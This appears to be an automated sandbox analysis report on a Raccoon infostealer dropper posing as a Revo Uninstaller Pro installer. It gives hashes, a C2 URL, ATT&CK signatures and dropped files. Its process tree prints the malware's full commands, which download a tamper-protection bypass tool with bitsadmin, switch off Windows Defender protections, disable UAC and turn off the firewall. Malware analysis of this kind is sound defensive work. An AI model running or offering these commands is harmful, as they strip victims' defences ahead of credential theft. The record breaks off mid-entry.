Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 14:53

General

  • Target

    0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe

  • Size

    18.8MB

  • MD5

    0b3937c39ea113c3352090ac5ce26103

  • SHA1

    9db17df61d6222c8d96a3969887d27c1568e4e7b

  • SHA256

    2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799

  • SHA512

    0bd27f4d58ccfc4b950d727f402ba260f98bf0e99d0f71bba4baa38131fcb0675d0b3105db3bf6bfb95388f0a717a54494ad9be889772b40e5b38f675564aa30

  • SSDEEP

    393216:6Y+TwhZBn9zau6aa17rtANXDa8H1Ecuv9WA2R+y3prshUy:6Y+UV9zau6lKNTLJ29QRy

Malware Config

Extracted

Family

raccoon

Version

1.7.3

Botnet

0343d4da493d263f78921a8724ca6adf05347cfe

Attributes
  • url4cnc

    https://telete.in/jbitchsucks

rc4.plain
rc4.plain

Signatures

  • Raccoon

    Raccoon is an infostealer written in C++ and first seen in 2019.

  • Raccoon Stealer V1 payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 14 IoCs
  • Loads dropped DLL 9 IoCs
  • Modifies system executable filetype association 2 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4092
    • C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp" /SL5="$C0060,18996440,788992,C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:4540
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4616
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3704
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer Explorers /download /priority FOREGROUND https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe C:\Users\Admin\AppData\Local\Temp\NSudo.exe
            5⤵
            • Download via BitsAdmin
            • System Location Discovery: System Language Discovery
            PID:5076
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionExtension ".bat""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4312
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4692
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
            5⤵
            • UAC bypass
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:636
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1200
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -PUAProtection disable"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3856
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:964
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1136
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2932
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1520
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2012
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4072
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2880
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3464
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3996
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4692
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -command "netsh advfirewall set allprofiles state off"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2248
            • C:\Windows\SysWOW64\netsh.exe
              "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\main.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2236
          • C:\Windows\SysWOW64\mode.com
            mode 65,10
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4264
          • C:\ProgramData\uzlyLtM20yixSdV\7z.exe
            7z.exe e file.zip -p___________5028pwd2533pwd24016___________ -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:4008
          • C:\ProgramData\uzlyLtM20yixSdV\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1872
          • C:\ProgramData\uzlyLtM20yixSdV\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:1520
          • C:\ProgramData\uzlyLtM20yixSdV\111.exe
            "111.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4612
            • C:\ProgramData\uzlyLtM20yixSdV\111.exe
              "C:\ProgramData\uzlyLtM20yixSdV\111.exe"
              6⤵
              • Executes dropped EXE
              PID:4760
            • C:\ProgramData\uzlyLtM20yixSdV\111.exe
              "C:\ProgramData\uzlyLtM20yixSdV\111.exe"
              6⤵
              • Executes dropped EXE
              PID:64
            • C:\ProgramData\uzlyLtM20yixSdV\111.exe
              "C:\ProgramData\uzlyLtM20yixSdV\111.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2752
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3948
          • C:\Windows\SysWOW64\timeout.exe
            timeout /T 180 /NOBREAK
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:1028
      • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe
        "C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3948
        • C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp" /SL5="$3024A,14516579,138240,C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3340
          • C:\Windows\system32\rundll32.exe
            "rundll32.exe " SETUPAPI.DLL,InstallHinfSection DefaultInstall 132 C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf
            5⤵
            • Drops file in Drivers directory
            • Adds Run key to start application
            • Suspicious use of WriteProcessMemory
            PID:708
            • C:\Windows\system32\runonce.exe
              "C:\Windows\system32\runonce.exe" -r
              6⤵
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:968
              • C:\Windows\System32\grpconv.exe
                "C:\Windows\System32\grpconv.exe" -o
                7⤵
                  PID:3264
            • C:\Windows\system32\regsvr32.exe
              "regsvr32" "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll" /s
              5⤵
              • Loads dropped DLL
              • Modifies system executable filetype association
              • Modifies registry class
              PID:1040
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe" /regserver /NOREDIRECT
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              PID:2596
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe" /bc
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetWindowsHookEx
              PID:3380
            • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
              "C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:4644
    • C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe
      C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe -Embedding
      1⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1184

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe

      Filesize

      14.2MB

      MD5

      dc21d689cfa1860e8820ed0ee45b1f2a

      SHA1

      acf2db6df76114601a2e58097629e0c8cbce129b

      SHA256

      01732d1f4d7862d00321ff4972d1d278825958c382c77fec6cdd9ced28a28d0c

      SHA512

      a4a87e46fccd0c7c99331fa13271bc663d4e5f5c03423da20474de0c62dc79af7ab9b39ca834b7965eeba2702394bfb0250bff87bce4dadb280ba364a7475140

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll

      Filesize

      188KB

      MD5

      75d7bf3468669a6c3df6f4d048315128

      SHA1

      678d3b531738573520367b47c0cd52cf5e431fa0

      SHA256

      927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae

      SHA512

      9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe

      Filesize

      23.7MB

      MD5

      ddb041550a3e69764cd9d7d3de3636f3

      SHA1

      1ad9b13a6627c1e6f258951965e39ba9cfd9cb1c

      SHA256

      54e416d5e3bfdd83cde4c9b42deb8839d1190369c12325aa324bd986210a6975

      SHA512

      00498cc2563e92d1b294dda04308aa77219d7e0b59c993ed61200d0ed641650f1d941147eb4e973fc92a7946e79c722607ceb3e1da5ce4b9f52ff3ce6cc8d800

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.ini

      Filesize

      111KB

      MD5

      c37fb8c46d0281dd27768fd1101614f0

      SHA1

      03e736a49687f9ac10b35cc791e7df5b7e55f4d8

      SHA256

      ee2e68e61821054a1946efd0260f7e70c3f338765d04edca7625d05677fd980c

      SHA512

      b074f71e06c38f484573edde490f85792ada589e953e96d64188461f41e8ca4d0a90a6fc081ec36e4dc0067337abeea567c40b4e4fd89522497b1ba735262776

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\russian.ini

      Filesize

      114KB

      MD5

      6c9dbe894ea20eb190db6b483f17030d

      SHA1

      1bac02001cba8c083b987264f1bb89b05b74155f

      SHA256

      24ffc231de9a4573b4ae743555c43dcc550ff8455ea681c788e50bda03a3a846

      SHA512

      b0941e0026ba9117d3cf846e89723dede9f9a00dde688dbf90715244cfdc38b75b579e1c02c788626b16cb6875934341fd2acb685c145389ccd629df9355f62a

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.inf

      Filesize

      2KB

      MD5

      edc78deb34de240c787b1011161e9a4e

      SHA1

      2d31275530dce33d3bc329991c8ad59e1b303577

      SHA256

      69569b4b111035cd35186da239d8241cf96350f6bb296210368ebc570fa2162b

      SHA512

      e55eefcc39b7353ef11a778910400c5c85cab9657bb350840988cbbf556dc343a9c1803442643c9255c149f8d93a5c2d2e6c3bea244f67c895e635eaec0a0f7b

    • C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

      Filesize

      9.6MB

      MD5

      1dd8459f2595e4c0603ad491590f6952

      SHA1

      607efe3c74388fb1e4b19f8f7ed2520ebfc349a1

      SHA256

      5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d

      SHA512

      c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d

    • C:\ProgramData\VS Revo Group\Revo Uninstaller Pro\revouninstallerpro4.lic

      Filesize

      64KB

      MD5

      8462a9b69c76a9603a4143d51fbc201e

      SHA1

      4473590f93f94f22c340a354516191c3c0ba6532

      SHA256

      fe4bcb4251f77375119a936c80fb36221af0c5105e840e2e115d47f96cb437c8

      SHA512

      2f02ecdb06760a093f4d8e6f04c97138695b064db8cb2dcc4af9b47c829852f38b77be9425eb2f3e3e36f85da181c116c829921fa35ae68afc57c728d5393570

    • C:\ProgramData\uzlyLtM20yixSdV\5jayrzw1q.vbs

      Filesize

      96KB

      MD5

      c84933bcccf41369ef9ecce015b86ed0

      SHA1

      624713276ae217d8d05c03598eecd31209c7f77a

      SHA256

      ca975635eaa8499a9fbd3873a71d6bd0ef5e253dc4528f4ad39824e31b176679

      SHA512

      221ecc4d8c1492cc3358f1d9f0017080733ff0b553e31b098968b81827e2f4cfb3f9bdeebdd328dde356397a2a6fc49f1e7495c196bebed6cbb70b0a23b86363

    • C:\ProgramData\uzlyLtM20yixSdV\7z.dll

      Filesize

      1.6MB

      MD5

      72491c7b87a7c2dd350b727444f13bb4

      SHA1

      1e9338d56db7ded386878eab7bb44b8934ab1bc7

      SHA256

      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

      SHA512

      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

    • C:\ProgramData\uzlyLtM20yixSdV\7z.exe

      Filesize

      458KB

      MD5

      619f7135621b50fd1900ff24aade1524

      SHA1

      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

      SHA256

      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

      SHA512

      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

    • C:\ProgramData\uzlyLtM20yixSdV\avNIprUwIk.bat

      Filesize

      22KB

      MD5

      b0a7842dd51df8942bc8b837282d1c2b

      SHA1

      0e9432597657c28ca9ac766ac7bf0a903d6aeb3b

      SHA256

      4a505f646a87f41b4163dc42a8f2ddbd0a64be29392dbf8c8b693cba9c72aaf8

      SHA512

      b65e7c5a08e1dace4b72861e7ecf95ebc68e9d2d624eac79fca2d1449a51d11271c4c837e72886c29713d320adf1ec3f02f7a89c633978e8dc6acb3fbec6e3a6

    • C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat

      Filesize

      111B

      MD5

      308ba58a50ffa9eabd31fdba79af6dd1

      SHA1

      29c09164facb6419f9d7f9e103f7e13bed4743a1

      SHA256

      0ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243

      SHA512

      674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f

    • C:\ProgramData\uzlyLtM20yixSdV\extracted\111.exe

      Filesize

      1.2MB

      MD5

      618155a1c0479bc80c4bd28b7af93162

      SHA1

      542bf77b03bbdc5cc5caf0582b39cdc185e686f6

      SHA256

      ea712e9759d73168f605f8a55771d4aef62b0bef4b45cb8fd68ed11ea11c2fb4

      SHA512

      b870452ce96985e431789c2497f4fa46194ce1bf56463e1dc99b98513236b8b01228ec08c734a6c6af739ee00cb715a6cd8a62382febab4678a1055c34d5a461

    • C:\ProgramData\uzlyLtM20yixSdV\extracted\ANTIAV~1.DAT

      Filesize

      2.0MB

      MD5

      3b9f43ca28acf55c64c9aa1ceb46c2d7

      SHA1

      7e30f2fde7a55b2023b03231993d66ea48513083

      SHA256

      ef08bdd7b11c188b1c0d0138dc9030fd3a2923512f983623bbdd34e55d95e50f

      SHA512

      58dece7172478fc948020de1dd67939331f0db1191b2583fa421406ba8d5d5a1907e2989447813ca1f0fdc0b9248e8bdb31db241f78e2b3f12d64f5c49f7d0a2

    • C:\ProgramData\uzlyLtM20yixSdV\extracted\file_1.zip

      Filesize

      995KB

      MD5

      c28ab5e6ae8588e03b92c24b14d12fef

      SHA1

      801c88fb58288fa2d54cf7584a089d6c50c02bb8

      SHA256

      ec59673a06768a14aed715995de14d34af211af5a4534059b5e22ab314a447a2

      SHA512

      a3f51f254166caba5664d5aca331142d481a60c803de8d69d5d278b1c74bcf2b312b07fd1e46e380ff3954f4e104674081fe3ceaa782b178adfab9226fe83442

    • C:\ProgramData\uzlyLtM20yixSdV\extracted\file_2.zip

      Filesize

      2.4MB

      MD5

      b935bb028c9e072364d33b5e482b93c9

      SHA1

      63a89514cfd0a64fc7a1fbcd5bd91f0c350a212b

      SHA256

      5d55c036145879b4e92a9bd1862ff15c83954469bf96ce7cc8afbd6229d21845

      SHA512

      a41c488f634d117dcee8aaf5de8bbf9463ae39be1b85aa12355cbec9f275085c44c3ed654e214fbbde8a51c260627c105b1902aebb66e0129f3c11d699de53bc

    • C:\ProgramData\uzlyLtM20yixSdV\file.bin

      Filesize

      2.4MB

      MD5

      3ba604f3bc038fae6d7d70df18a95e8d

      SHA1

      f8553490c0063dba7d0e69b9e688d9abfec98314

      SHA256

      5077f9091c91a13eb822227b0a4e9a2f277542eec22910f794a44606fea16af5

      SHA512

      3144a0fb0ffc02e2cf35bffad36b42a76c6f7edd3089eeac884bb742278a68245143da981d54b9e0c026778bdf9ca38d19ea69c09e206e86defbd17427d1f642

    • C:\ProgramData\uzlyLtM20yixSdV\main.bat

      Filesize

      386B

      MD5

      1376349b5831fe5760106870cd5bad6d

      SHA1

      cf6ff2d17e597893a61fedfd4fe90748ab2349e1

      SHA256

      67fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872

      SHA512

      64af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      6bff6adce2a7cc1a2f331061641c82f3

      SHA1

      80cc8d381b16b0ea86894252fffefcc206b403ce

      SHA256

      a02ca11204d69c3430a630540209bd89886b8106614bfaac0eb0e1dc8e6a7f9f

      SHA512

      e3652c9cb68566c281d62e78a6494a215349c41a58d01ac0c4f1e909af3ce07f1c57bc2834e3d2ad584a1fbecdbdeb81fab4d7ff80c91b98920d219ca87e77ef

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      73909591451d3d1f7c6e353a52ce7afa

      SHA1

      f7f0badcda6bbe4666233728e4fc57e2061ff911

      SHA256

      938ed00289d478f6234221da4c836e4ed5b281d75f28aa27e737ca92d98e0a24

      SHA512

      3b292f129ffac3333897ddbc488b5ce84a31095b1c6ae9736ef21bfd359ea51c5da99ccd7af62395133a5abfb273ed43cfb92c48857b6865b24a1f27ef52ceec

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      759d93b25e23ab1faa35f2e13b3adb9e

      SHA1

      325cee68c2765b166c648374b6ad6e07080ec03c

      SHA256

      46da386d4198c126a60b8c3b293c674ce8b844c7b0893a6956638947a9797e32

      SHA512

      89090bc8dff1a9ddfae2cf37eab5d72ba6f88c2ea5241932cba550c6d024604726d49eceda2aa833f84d2220866102224e8f0af241f47a04604a936faa5f2899

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      16e084bc764dbfb34c262d32abb743e6

      SHA1

      1ce50039217fca8441984a5f79ebf4db9da5354d

      SHA256

      a3c01d310fd888da1f2ceccfe4bbedd2d139bd66da10cb68914f0fc4153ad599

      SHA512

      ff67806345700e42bb205cd471011cd7b88f2aff01bba27eea6c4062c6cde059f3a6b8d8d9c94ccc51bc5cd91d4aea24d7d832f5d186d37c869f215483987b02

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      6190fc29490068464249b428f75047d6

      SHA1

      e5f555b2985167e13f61907cf9a00a78a0c7dd76

      SHA256

      3cde051d26ea7c7073a3e73c0e903cd5aa60b8e502573e8e0c7391effb6588bc

      SHA512

      81d0999325fdd3ee61044abf7698a45ba6d6fb00e9474fdd30c08d3414063d62bbdb3c620e722db7e613200378380c49218a8d52b040386372aaab4f311e0ab4

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      18KB

      MD5

      46057eda4d28b17e51e7e708dd570c9a

      SHA1

      6a5d6a620dd326ccc6c6f4759118de9b4b90ce74

      SHA256

      0c94c7500f261fe14483f1c927f08e26980c1e5dd0bf83e866cdda1c8a7adcf3

      SHA512

